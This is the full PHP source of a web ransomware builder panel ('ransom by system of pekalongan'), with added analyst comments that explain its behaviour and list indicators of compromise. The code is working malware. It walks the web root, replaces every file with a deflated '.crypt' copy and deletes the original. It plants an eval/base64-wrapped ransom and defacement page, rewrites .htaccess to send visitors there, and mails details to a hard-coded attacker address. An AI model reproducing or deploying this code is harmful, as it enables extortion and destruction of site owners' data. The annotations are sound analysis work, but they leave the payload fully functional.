편집 파일: crypt2.php
<title>ransom by system of pekalongan</title> <link rel="shortcut icon" type="image/x-icon" href="https://i.ibb.co/6gXqB7L/Cyto-Xploit-Forum-20191024-104350.jpg"> <style> html { color: red; } input { background: transparent; color: white; border: 1px solid red; } body { background-image: url('https://e.top4top.io/p_1740dg0o00.jpg'); background-repeat: no-repeat; background-size: cover; } </style> <?php
/*
 * ANALYST NOTE (annotation only; the code itself is unchanged).
 *
 * What this file is: a PHP web "ransomware" builder page. With no POST data it
 * renders a form (pass, email, paypal, price). When a POST carries `pass`, it
 * walks $_SERVER['DOCUMENT_ROOT'] recursively and replaces every file whose
 * path does not contain ".crypt" with a "<name>.crypt" copy, then installs a
 * ransom page (crypt.php) and an .htaccess that routes visitors to it.
 *
 * Recovery: the per-file transformation is gzdeflate(contents, 9), i.e. plain
 * DEFLATE compression. The submitted `pass` is never used on file contents, so
 * no key exists; the .crypt files can be restored with gzinflate() (the
 * embedded template below uses exactly that) or from backup.
 *
 * Artifacts worth searching for on a suspected host: files ending in .crypt,
 * crypt.php, .htabackup, an .htaccess containing "DirectoryIndex crypt.php"
 * with ErrorDocument 403, 404 and 500 lines, PHP files consisting of
 * eval() around base64_decode(), and mail() traffic with the subject
 * 'Your Ransomware Info' or to the hard-coded address further down.
 *
 * The three calls that follow silence all PHP errors and lift the execution
 * time and memory limits for the request.
 */
error_reporting(0); set_time_limit(0); ini_set('memory_limit', '-1'); if(isset($_POST['pass'])) {
/*
 * encfile($filename): per-file routine.
 *  - Returns early when the path contains '.crypt' (substring test on the whole
 *    path, not only the extension).
 *  - Otherwise writes the deflated copy to "<filename>.crypt" and unlinks the
 *    original.
 *  - Everything after that (copying .htaccess to .htabackup, rebuilding
 *    crypt.php, rewriting .htaccess) sits inside this function too, so it is
 *    repeated for every processed file, using paths relative to the working
 *    directory. Consequence for responders: from the second file onward the
 *    copy() overwrites .htabackup with the already-replaced .htaccess, so
 *    .htabackup should not be trusted as the original configuration.
 *  - $file is a base64-encoded PHP/HTML template (defacement page plus restore
 *    routine); it is only decoded here, not executed.
 */
function encfile($filename){ if (strpos($filename, '.crypt') !== false) { return; } file_put_contents($filename.".crypt", gzdeflate(file_get_contents($filename), 9)); unlink($filename); copy('.htaccess','.htabackup'); $file = base64_decode("PD9waHANCmVycm9yX3JlcG9ydGluZygwKTsNCiRpbnB1dCA9ICRfUE9TVFsncGFzcyddOw0KJHBhc3MgPSAicm9vdEB4LWtyeXB0MG4teDMxMzM3ODgxMiI7DQppZihpc3NldCgkaW5wdXQpKSB7DQppZihtZDUoJGlucHV0KSA9PSAkcGFzcykgew0KZnVuY3Rpb24gZGVjZmlsZSgkZmlsZW5hbWUpew0KICBpZiAoc3RycG9zKCRmaWxlbmFtZSwgJy5jcnlwdCcpID09PSBGQUxTRSkgew0KICByZXR1cm47DQogIH0NCiAgJGRlY3J5cHRlZCA9IGd6aW5mbGF0ZShmaWxlX2dldF9jb250ZW50cygkZmlsZW5hbWUpKTsNCiAgZmlsZV9wdXRfY29udGVudHMoc3RyX3JlcGxhY2UoJy5jcnlwdCcsICcnLCAkZmlsZW5hbWUpLCAkZGVjcnlwdGVkKTsNCiAgdW5saW5rKCdzeXN0ZW1vZnBla2Fsb25nYW4ucGhwJyk7DQogIHVubGluaygnLmh0YWNjZXNzJyk7DQogIHVubGluaygkZmlsZW5hbWUpOw0KICBlY2hvICIkZmlsZW5hbWUgRGVjcnlwdGVkICEhITxicj4iOw0KfQ0KDQpmdW5jdGlvbiBkZWNkaXIoJGRpcil7DQogICRmaWxlcyA9IGFycmF5X2RpZmYoc2NhbmRpcigkZGlyKSwgYXJyYXkoJy4nLCAnLi4nKSk7DQogICAgZm9yZWFjaCgkZmlsZXMgYXMgJGZpbGUpIHsNCiAgICAgIGlmKGlzX2RpcigkZGlyLiIvIi4kZmlsZSkpew0KICAgICAgICBkZWNkaXIoJGRpci4iLyIuJGZpbGUpOw0KICAgICAgfWVsc2Ugew0KICAgICAgICBkZWNmaWxlKCRkaXIuIi8iLiRmaWxlKTsNCiAgICB9DQogIH0NCn0NCg0KZGVjZGlyKCRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10pOw0KZWNobyAiPGJyPldlYnJvb3QgRGVjcnlwdGVkPGJyPiI7DQp1bmxpbmsoJF9TRVJWRVJbJ1BIUF9TRUxGJ10pOw0KdW5saW5rKCcuaHRhY2Nlc3MnKTsNCmNvcHkoJ2h0YWJhY2t1cCcsJy5odGFjY2VzcycpOw0KZWNobyAnU3VjY2VzcyAhISEnOw0KfSBlbHNlIHsNCmVjaG8gJ0ZhaWxlZCBQYXN
zd29yZCAhISEnOw0KfQ0KZXhpdCgpOw0KfQ0KPz4NCjxodG1sPg0KPGhlYWQ+IA0KPHRpdGxlPkhhY2tlZCBCeSByb290QHgta3J5cHQwbi14PC90aXRsZT4NCjxtZXRhIHByb3BlcnR5PSJvZzppbWFnZSIgY29udGVudD0iaHR0cHM6Ly9lbmNyeXB0ZWQtdGJuMC5nc3RhdGljLmNvbS9pbWFnZXM/cT10Ym4lM0FBTmQ5R2NTdWU2YUZPcXM1MExnYkxrR1Z4a1prZW9YWDE5OWlkN0NjOUEmdXNxcD1DQVUiLz48bWV0YSBuYW1lPSJkZXNjcmlwdGlvbiIgY29udGVudD0ieyBFQUggfSIgLz4NCjxtZXRhIG5hbWU9Imdvb2dsZS1zaXRlLXZlcmlmaWNhdGlvbiIgY29udGVudD0iVG91Y2hlZCBCeSByb290QHgta3J5cHQwbi14Ii8+DQo8bWV0YSBuYW1lPSJ0aGVtZS1jb2xvciIgY29udGVudD0iYmxhY2siPg0KPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9InN5c3RlbSBvZiBwZWthbG9uZ2FuIHdhcyBoZXJlIj4NCjxtZXRhIG5hbWU9ImF1dGhvciIgY29udGVudD0icm9vdEB4LWtyeXB0MG4teCBzeXN0ZW0gb2YgcGVrYWxvbmdhbiIvPg0KPG1ldGEgbmFtZT0ia2V5d29yZHMiIGNvbnRlbnQ9InJvb3RAeC1rcnlwdDBuLXgiLz4NCjxtZXRhIG5hbWU9Im9nOnRpdGxlIiBjb250ZW50PSJZb3UgSGF2ZSBCZWVuIEhhY2tlZCIvPg0KPG1ldGEgcHJvcGVydHk9Im9nOmltYWdlIiBjb250ZW50PSJodHRwczovL2YudG9wNHRvcC5pby9wXzE3NDQyMTJ0MjAuanBnIiAvPg0KPG1ldGEgcHJvcGVydHk9Im9nOnR5cGUiIGNvbnRlbnQ9IndlYnNpdGUiIC8+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KICBib2R5ew0KICAgIGJhY2tncm91bmQtY29sb3I6IGJsYWNrOw0KICAgIH0NCiAgLmNvbnRhaW5lciB7DQogIGhlaWdodDogMTAwJTsNCiAgd2lkdGg6IDEwMCU7DQogIGZvbnQtc2l6ZTogMjVweDsNCiAganVzdGlmeS1jb250ZW50OiBjZW50ZXI7DQogIGFsaWduLWl0ZW1zOiBjZW50ZXI7DQogIGRpc3BsYXk6IGZsZXg7DQogIGNvbG9yOiB3aGl0ZTsNCiAgfQ0KICAubWVzc2FnZSB7DQogICAgY29sb3I6IHdoaXRlOw0KICAgIC13ZWJraXQtYW5pbWF0aW9uOiBmYWRlSW4gMXMgZWFzZS1pbjsNCiAgICBhbmltYXRpb246IGZhZGVJbiAxcyBlYXNlLWluOw0KPC9zdHlsZT4NCjxib2R5Pg0KPGNlbnRlcj48Zm9udCBzdHlsZT0iY29sb3I6d2hpdGU7IHRleHQtc2hhZG93OiByZWQgMnB4IDJweCAycHg7IGZvbnQtc2l6ZTogMjVweDsgZm9udC1mYW1pbHk6IE5vc2lmZXI7Ij5IQUNLRUQ8L2ZvbnQ+PC9jZW50ZXI+DQogIDxicj48YnI+PGJyPg0KICA8Y2VudGVyPjxmb250IHN0eWxlPSJjb2xvcjogcmVkO2ZvbnQtc2l6ZTogMjBweCI+TWVzc2FnZSA6PC9mb250PjwvY2VudGVyPg0KICA8YnI+PGJyPjxicj4NCiAgPGJyPjxicj48YnI+DQogIDxicj48YnI+PGJyPg0KICA8ZGl2IGNsYXNzPSJjb250YWluZXIiPjxkaXYgY2xhc3M9InRleHQiPjwvZGl2PjwvZGl2Pg0KICA8YnI+PGJyPjxicj4NCiAgPGJyPjxicj48YnI+DQogIDxicj48YnI
+PGJyPg0KICA8YnI+PGJyPjxicj4NCiAgPGJyPjxicj48YnI+DQogIDxjZW50ZXI+PGZvbnQgc3R5bGU9ImNvbG9yOndoaXRlO2ZvbnQtc2l6ZTogMTVweDsiPnwgWU9VUiA8Zm9udCBzdHlsZT0iY29sb3I6cmVkO2ZvbnQtc2l6ZTogMTVweCI+IFNFQ1VSSVRZPGZvbnQgc3R5bGU9ImNvbG9yOiB3aGl0ZTtmb250LXNpemU6IDE1cHgiPiBJUyBWRVJZPGZvbnQgc3R5bGU9ImNvbG9yOiByZWQ7Zm9udC1zaXplOiAxNXB4Ij4gTE9XIDxmb250IHN0eWxlPSJjb2xvcjp3aGl0ZTtmb250LXNpemU6IDE1cHg7Ij4gfDwvZm9udD48L2ZvbnQ+PC9mb250PjwvZm9udD48L2NlbnRlcj4NCiAgPGJyPg0KPC9ib2R5Pg0KPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KICAgIGNsYXNzIFRleHRTY3JhbWJsZSB7DQogICAgICBjb25zdHJ1Y3RvcihlbCkgew0KICAgICAgICB0aGlzLmVsID0gZWwNCiAgICAgICAgdGhpcy5jaGFycyA9ICc8Pi8/O1tdWystIUAjJCVeJiopKCwufmAnDQogICAgICAgIHRoaXMudXBkYXRlID0gdGhpcy51cGRhdGUuYmluZCh0aGlzKQ0KICAgICAgfQ0KICAgICAgc2V0VGV4dChuZXdUZXh0KSB7DQogICAgICAgIGNvbnN0IG9sZFRleHQgPSB0aGlzLmVsLmlubmVyVGV4dA0KICAgICAgICBjb25zdCBsZW5ndGggPSBNYXRoLm1heChvbGRUZXh0Lmxlbmd0aCwgbmV3VGV4dC5sZW5ndGgpDQogICAgICAgIGNvbnN0IHByb21pc2UgPSBuZXcgUHJvbWlzZSgocmVzb2x2ZSkgPT4gdGhpcy5yZXNvbHZlID0gcmVzb2x2ZSkNCiAgICAgICAgdGhpcy5xdWV1ZSA9IFtdDQogICAgICAgIGZvciAobGV0IGkgPSAwOyBpIDwgbGVuZ3RoOyBpKyspIHsNCiAgICAgICAgICBjb25zdCBmcm9tID0gb2xkVGV4dFtpXSB8fCAnJw0KICAgICAgICAgIGNvbnN0IHRvID0gbmV3VGV4dFtpXSB8fCAnJw0KICAgICAgICAgIGNvbnN0IHN0YXJ0ID0gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNDApDQogICAgICAgICAgY29uc3QgZW5kID0gc3RhcnQgKyBNYXRoLmZsb29yKE1hdGgucmFuZG9tKCkgKiA0MCkNCiAgICAgICAgICB0aGlzLnF1ZXVlLnB1c2goeyBmcm9tLCB0bywgc3RhcnQsIGVuZCB9KQ0KICAgICAgICB9DQogICAgICAgIGNhbmNlbEFuaW1hdGlvbkZyYW1lKHRoaXMuZnJhbWVSZXF1ZXN0KQ0KICAgICAgICB0aGlzLmZyYW1lID0gMA0KICAgICAgICB0aGlzLnVwZGF0ZSgpDQogICAgICAgIHJldHVybiBwcm9taXNlDQogICAgICB9DQogICAgICB1cGRhdGUoKSB7DQogICAgICAgIGxldCBvdXRwdXQgPSAnJw0KICAgICAgICBsZXQgY29tcGxldGUgPSAwDQogICAgICAgIGZvciAobGV0IGkgPSAwLCBuID0gdGhpcy5xdWV1ZS5sZW5ndGg7IGkgPCBuOyBpKyspIHsNCiAgICAgICAgICBsZXQgeyBmcm9tLCB0bywgc3RhcnQsIGVuZCwgY2hhciB9ID0gdGhpcy5xdWV1ZVtpXQ0KICAgICAgICAgIGlmICh0aGlzLmZyYW1lID49IGVuZCkgew0KICAgICAgICAgICAgY29tcGxldGUrKw0KICAgICAgICAgICAgb3V0cHV0ICs9IHR
vDQogICAgICAgICAgfSBlbHNlIGlmICh0aGlzLmZyYW1lID49IHN0YXJ0KSB7DQogICAgICAgICAgICBpZiAoIWNoYXIgfHwgTWF0aC5yYW5kb20oKSA8IDAuMjgpIHsNCiAgICAgICAgICAgICAgY2hhciA9IHRoaXMucmFuZG9tQ2hhcigpDQogICAgICAgICAgICAgIHRoaXMucXVldWVbaV0uY2hhciA9IGNoYXINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIG91dHB1dCArPSBgPHNwYW4gY2xhc3M9ImR1ZCI+JHtjaGFyfTwvc3Bhbj5gDQogICAgICAgICAgfSBlbHNlIHsNCiAgICAgICAgICAgIG91dHB1dCArPSBmcm9tDQogICAgICAgICAgfQ0KICAgICAgICB9DQogICAgICAgIHRoaXMuZWwuaW5uZXJIVE1MID0gb3V0cHV0DQogICAgICAgIGlmIChjb21wbGV0ZSA9PT0gdGhpcy5xdWV1ZS5sZW5ndGgpIHsNCiAgICAgICAgICB0aGlzLnJlc29sdmUoKQ0KICAgICAgICB9IGVsc2Ugew0KICAgICAgICAgIHRoaXMuZnJhbWVSZXF1ZXN0ID0gcmVxdWVzdEFuaW1hdGlvbkZyYW1lKHRoaXMudXBkYXRlKQ0KICAgICAgICAgIHRoaXMuZnJhbWUrKw0KICAgICAgICB9DQogICAgICB9DQogICAgICByYW5kb21DaGFyKCkgew0KICAgICAgICByZXR1cm4gdGhpcy5jaGFyc1tNYXRoLmZsb29yKE1hdGgucmFuZG9tKCkgKiB0aGlzLmNoYXJzLmxlbmd0aCldDQogICAgICB9DQogICAgfQ0KICAgIA0KICAgIGNvbnN0IHBocmFzZXMgPSBbDQogICAgICAndXBzIHlvdXIgd2Vic2l0ZSBpdHMgbWluZScsDQogICAgICAneGl4aXhpIHRoaXMgd2Vic2l0ZSBoYXMgYmVlbiBpbmplY3RlZCByYW5zb213YXJlJywNCiAgICAgICdzeXN0ZW0gb2YgcGVrYWxvbmdhbiB3YXMgaGVyZScsDQogICAgICAnd2hvIHdhcyBoYWNrZWQgeW91ciB3ZWJzaXRlPycsDQogICAgICAnaGFja2VkIGJ5IHJvb3RAeC1rcnlwdDBuLXgnLA0KICAgICAgJ3JlbWVtYmVyIGl0JywNCiAgICAgICd0aHggdG8gOiAnDQogICAgICAnYWxsIG1lbWJlciBzeXN0ZW0gb2YgcGVrYWxvbmdhbicsDQogICAgICAncGVrYWxvbmdhbiBibGFja2hhdCcsDQogICAgICAnZGVzZXB0aWNvbiBwaXJhdGVzIGN5YmVyJywNCiAgICAgICd1bml0ZWQgbWFzdGVyIGN5YmVyJywNCg0KICAgIF0NCiAgICANCiAgICBjb25zdCBlbCA9IGRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoJy50ZXh0JykNCiAgICBjb25zdCBmeCA9IG5ldyBUZXh0U2NyYW1ibGUoZWwpDQogICAgDQogICAgbGV0IGNvdW50ZXIgPSAwDQogICAgY29uc3QgbmV4dCA9ICgpID0+IHsNCiAgICAgIGZ4LnNldFRleHQocGhyYXNlc1tjb3VudGVyXSkudGhlbigoKSA9PiB7DQogICAgICAgIHNldFRpbWVvdXQobmV4dCwgMTUwMCkNCiAgICAgIH0pDQogICAgICBjb3VudGVyID0gKGNvdW50ZXIgKyAxKSAlIHBocmFzZXMubGVuZ3RoDQogICAgfQ0KICAgIA0KICAgIG5leHQoKQ0KICAgIA0KICAgICd1c2Ugc3RyaWN0JzsNCiAgICANCiAgICA8L3NjcmlwdD4NCjwvaHRtbD4="); $q = str_replace('ucUs7', md5($_POST['pass']), 
$file); $w = str_replace('hraxzd@gmail.com', $_POST['email'], $q); $e = str_replace('paypal.me/CytoRizki', $_POST['paypal'], $w); $r = str_replace('$100', '$'.$_POST['price'], $e); $dec = $r;
/*
 * The four str_replace() calls above substitute md5(pass) and the raw,
 * unvalidated POST fields email/paypal/price for the placeholders 'ucUs7',
 * 'hraxzd@gmail.com', 'paypal.me/CytoRizki' and '$100' in the decoded template.
 * NOTE(review): the opening of the decoded template appears to assign $pass a
 * fixed literal rather than the 'ucUs7' placeholder, in which case its
 * md5($input) == $pass check could not succeed for any password. Confirm by
 * decoding the blob offline in an isolated environment; either way, restoring
 * the files does not depend on that password (see the header note).
 *
 * Next, the result is re-encoded and wrapped in eval() around base64_decode(),
 * then written to crypt.php; .htaccess is rewritten so crypt.php becomes the
 * directory index and the 403/404/500 error document. Both patterns are
 * useful as file-scanner signatures.
 */
$comp = "<?php eval('?>'.base64_decode("."'".base64_encode($dec)."'".").'<?php '); ?>"; $cok = fopen('crypt.php', 'w'); fwrite($cok, $comp); fclose($cok); $hta = "DirectoryIndex crypt.php\n ErrorDocument 403 /crypt.php\n ErrorDocument 404 /crypt.php\n ErrorDocument 500 /crypt.php\n"; $ht = fopen('.htaccess', 'w'); fwrite($ht, $hta); fclose($ht); echo "$filename Encrypted !!!<br>"; }
/*
 * encdir($dir): recursive walk. Lists $dir with scandir(), drops '.' and '..',
 * recurses into sub-directories and hands every other entry to encfile().
 * No symlink, ownership or permission checks are visible here, so the reach
 * is whatever the web-server account can read and write under $dir.
 */
function encdir($dir){ $files = array_diff(scandir($dir), array('.', '..')); foreach($files as $file) { if(is_dir($dir."/".$file)){ encdir($dir."/".$file); } else { encfile($dir."/".$file); } } }
/*
 * Entry point: starts the walk at DOCUMENT_ROOT, then copies crypt.php into
 * DOCUMENT_ROOT. The last two copy() calls join DOCUMENT_ROOT and
 * '.htaccess' / '.htabackup' without a '/' separator, so when DOCUMENT_ROOT
 * has no trailing slash the copies land next to the web root under names
 * like "<docroot>.htaccess" and "<docroot>.htabackup", which are two more
 * artifacts to look for during clean-up.
 */
if(isset($_POST['pass'])){ encdir($_SERVER['DOCUMENT_ROOT']); } copy('crypt.php', $_SERVER['DOCUMENT_ROOT'].'/crypt.php'); copy('.htaccess', $_SERVER['DOCUMENT_ROOT'].'.htaccess'); copy($_SERVER['DOCUMENT_ROOT'].'.htaccess', $_SERVER['DOCUMENT_ROOT'].'.htabackup');
/*
 * Mails the plaintext password to the address typed into the form. The subject
 * string is fixed, which makes it searchable in MTA logs.
 * NOTE(review): $_SERVER['HTTP_ADDR'] is not a standard server variable; it
 * would presumably be set only if the request carried an "Addr" header, so the
 * "Domain" field is likely empty in practice.
 */
$to = $_POST['email']; $subject = 'Your Ransomware Info'; $message = "Domain : ".$_SERVER['HTTP_ADDR']."\n\n"."Your Password : ".$_POST['pass']; if(mail($to,$subject,$message)) { echo 'Password Saved In Your Mail !!!'; } else { echo 'Password Not In Your Mail !!!'; } exit(); } ?> <center> <h1>Ransomware File encrypt<br>Welcome root@x-krypt0n-x</h1><br> <img height="300" src="https://ctftime.org/media/team/logo_206.png"/> <br><br><h3>Information Server :</h3> Path File : <font color="red"><?php echo $_SERVER['SCRIPT_FILENAME'] ; ?></font><br> Disable Function : <font color="red"><?php $ds = @ini_get("disable_functions"); $show_ds = (!empty($ds)) ? 
"$ds" : "NONE"; echo $show_ds; ?></font> Mail Function : <font color="red"><?php
/*
 * Rendering the panel (any request without `pass`) sends a test message to a
 * hard-coded address. Besides probing whether mail() works, this discloses the
 * host to that mailbox on every page load; the recipient and the 'tes' subject
 * are usable indicators in outbound mail logs.
 */
if(mail('hraxzd@gmail.com','tes','tes')) { echo "ON"; } else { echo "OFF"; } ?></font> <br><Br> <form enctype="multipart/form-data" method="post"> Password Encrypt : <input type="text" name="pass"> Your Email : <input type="text" name="email"> <br><br> Your Paypal Address : <input type="text" name="paypal"> Your Price : <input type="text" name="price"> <br><br> <input type="submit" value="Encrypt"> </form>